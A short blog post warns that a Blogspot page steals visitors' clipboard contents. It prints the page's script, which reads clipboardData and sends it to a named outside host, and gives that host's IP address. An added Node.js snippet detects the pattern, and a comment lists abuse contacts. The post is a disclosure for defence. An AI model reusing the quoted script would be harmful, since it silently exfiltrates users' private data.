First, do not visit this page unless you are using IE7, Firefox or Opera:
http://treespeaker.blogspot.com/2007/01/testing-on-toilet.html
If you are using IE7, you're going to get a warning, asking if this webpage can have access to the contents of your clipboard. Say "No."
Even though the page itself is fairly legitimate, some of the content is not. If you look at the source for the page, you'll see the following...
<script language="javascript" src="http://noone.homeip.net/GacWeb/rslite.js">
</script>
<script>
function body_onLoad(){
  RSLite = new RSLiteObject();
  var cb = window.clipboardData.getData('Text');
  RSLite.call('http://noone.homeip.net/Info/info.aspx?cb=' + cb);
}
</script>
In short, this page is trying to steal any information off of your clipboard and send it to a server that's currently at the IP address 69.217.141.66 (ppp-69-217-141-66.dsl.emhril.ameritech.net).
Have fun with this dude. Since SBC merged with AT&T, I can't find the anti-fraud links on their site, so someone please find that info and report this guy so I can finish eating...
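An added example, not part of the original post: a small Node.js check that a defender could run over saved page source to flag the pattern shown above (a script loaded from another host, a `clipboardData.getData` read, and that value appended to a URL). The function name `auditPageSource` and the finding labels are made up for this example, and the regex heuristic only covers the assign-then-concatenate form seen in the post.

```javascript
// Added example: static audit of page source for the clipboard-exfiltration pattern.
// Matches "<name> = window.clipboardData.getData(" and captures the variable name.
const CLIPBOARD_READ = /([A-Za-z_$][\w$]*)\s*=\s*(?:window\.)?clipboardData\.getData\s*\(/;

function auditPageSource(html, pageUrl) {
  const pageHost = new URL(pageUrl).hostname;
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const [, attrs, body] = m;
    // 1. External scripts served from a host other than the page's own.
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) {
      const host = new URL(src[1], pageUrl).hostname;
      if (host !== pageHost) findings.push({ type: 'third-party-script', host });
    }
    // 2. Inline code that reads the clipboard into a variable.
    const read = CLIPBOARD_READ.exec(body);
    if (!read) continue;
    findings.push({ type: 'clipboard-read', variable: read[1] });
    // 3. That variable concatenated onto an absolute URL string literal.
    const name = read[1].replace(/\$/g, '\\$&');
    const sink = new RegExp(`["'](https?://[^"']+)["']\\s*\\+\\s*${name}(?![\\w$])`);
    const hit = sink.exec(body);
    if (hit) findings.push({ type: 'clipboard-to-url', host: new URL(hit[1]).hostname });
  }
  return findings;
}

// Sample input: the markup quoted in the post, embedded so the check runs offline.
const SAMPLE = `
<script language="javascript" src="http://noone.homeip.net/GacWeb/rslite.js">
</script>
<script>
function body_onLoad(){
  RSLite = new RSLiteObject();
  var cb = window.clipboardData.getData('Text');
  RSLite.call('http://noone.homeip.net/Info/info.aspx?cb=' + cb);
}
</script>`;
const PAGE = 'http://treespeaker.blogspot.com/2007/01/testing-on-toilet.html';

console.log(auditPageSource(SAMPLE, PAGE));
```

A direct read passed straight into a call, with no intermediate variable, is outside what this heuristic matches.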
1 comment:
I am not 100% sure these are still working but I found these e-mail addresses that were last updated in 2005 which were associated with the registrant of the IP range:
abuse@sbcglobal.net
abuse@swbell.net
Also, a temporary stopgap may be available by contacting someone at www.dyndns.com to shut down the DNS services.